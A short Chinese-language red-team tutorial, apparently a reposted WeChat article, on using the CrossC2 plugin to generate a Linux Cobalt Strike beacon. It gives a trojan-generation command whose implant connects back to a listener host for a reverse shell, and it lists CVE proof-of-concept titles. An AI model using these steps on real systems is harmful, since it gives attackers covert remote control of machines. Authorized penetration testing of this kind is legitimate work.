用cobalt strike 上线linux 主机
2021-11-06 21:04:20 Author: mp.weixin.qq.com(查看原文) 阅读量:54 收藏

后知后觉 发了一个大佬们用了很久的工具

一、简述

CrossC2插件是为企业和红团队人员提供的安全框架,支持 CobaltStrike 对其他平台的渗透测试(Linux / MacOS /…),支持自定义模块,并包括一些常用的渗透模块。

利用CrossC2插件通过在Linux上执行木马反弹一个CobaltStrike类型的shell。

CrossC2插件项目地址:https://github.com/gloxec/CrossC2


WindowsLinuxMacOSiOSAndroidEmbedded
Run Env (x86)




Run Env (x64)


gen beacon (x86)



gen beacon (x64)



gen beacon (armv7)



gen beacon (arm64)



gen beacon (mips[el])




受限描述:

  • CobaltStrike: 暂时仅支持3.14最后一个版本(bug fixs), 以及4.x版本(详见cs4.1分支).

  • Linux: 特别老旧的系统可以选择cna中的"Linux-GLIBC"选项(2010年左右)

  • MacOS: 新系统仅支持64位程序

  • iOS: sandbox

  • Embedded: only *nix

  • ⍻ : 加载还在完善中

用法:

https://gloxec.github.io/CrossC2/zh_cn/usage/genCross.html

二、实验

1.genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。

img

2.由于 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听,服务端开启监听 windows/beacon_https/reverse_https 类型的beacon

img

3.生成木马

./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test

img

4.执行木马上线

img

成功上线

img

大华摄像头 CVE-2021-33044-CVE-2021-33045   POC
 ApacheCVE-2021-42013
|CVE-2021-31166  POC
CVE-2021-41773
CVE-2021-40444 CS线
CVE-2020-0787 Windows  
RG-UAC

LinuxCVE-2021-3493

CVE-2019-19781 Citrix ADC 


文章来源: http://mp.weixin.qq.com/s?__biz=MzI0Nzc0NTcwOQ==&mid=2247485161&idx=1&sn=a097e7dad54b5dcb9aa2536fec87f5b1&chksm=e9aa1b2bdedd923d83eff1d165f34431ca2d82105d2da5731499c7d35486cfbe8418c059fbe3#rd
如有侵权请联系:admin#unsafe.sh